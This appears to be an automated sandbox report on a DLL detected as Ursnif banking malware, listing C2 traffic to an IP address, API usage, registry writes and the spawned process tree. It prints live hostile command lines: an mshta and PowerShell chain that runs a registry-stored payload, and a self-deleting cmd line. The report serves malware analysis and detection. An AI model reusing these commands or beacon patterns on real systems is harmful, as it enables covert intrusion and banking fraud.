                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F4CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_049F4CC6
                      Source: global trafficHTTP traffic detected: GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_049F3072

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: VoevdOQpeU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F821C2_2_049F821C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F198A2_2_049F198A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F475F2_2_049F475F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058184D92_2_058184D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05808FA62_2_05808FA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058237F42_2_058237F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05801E502_2_05801E50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581C3A92_2_0581C3A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05820B0E2_2_05820B0E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581488B CreateProcessAsUserW,2_2_0581488B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F3A9C NtMapViewOfSection,2_2_049F3A9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F4695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_049F4695
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F25D7 GetProcAddress,NtCreateSection,memset,2_2_049F25D7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F8441 NtQueryVirtualMemory,2_2_049F8441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05815D9D NtQueryInformationProcess,2_2_05815D9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581F5FF memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,2_2_0581F5FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05815CA1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_05815CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058144A5 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,2_2_058144A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05801C78 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,2_2_05801C78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581312E RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_0581312E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058212F1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_058212F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581AD9E NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_0581AD9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581B628 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_0581B628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581264B NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,2_2_0581264B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05815188 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,2_2_05815188
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058029B2 NtGetContextThread,RtlNtStatusToDosError,2_2_058029B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581C1C2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_0581C1C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580A085 memset,NtQueryInformationProcess,2_2_0580A085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05815830 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,2_2_05815830
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05801B92 NtQuerySystemInformation,RtlNtStatusToDosError,2_2_05801B92
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05807A1E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,2_2_05807A1E
                      Source: VoevdOQpeU.dllBinary or memory string: OriginalFilenamerpcapd.exe0 vs VoevdOQpeU.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: VoevdOQpeU.dllReversingLabs: Detection: 38%
                      Source: VoevdOQpeU.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"Jump to behavior
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -hJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220423Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F57.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@29/23@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F6DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,2_2_049F6DB6
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1428
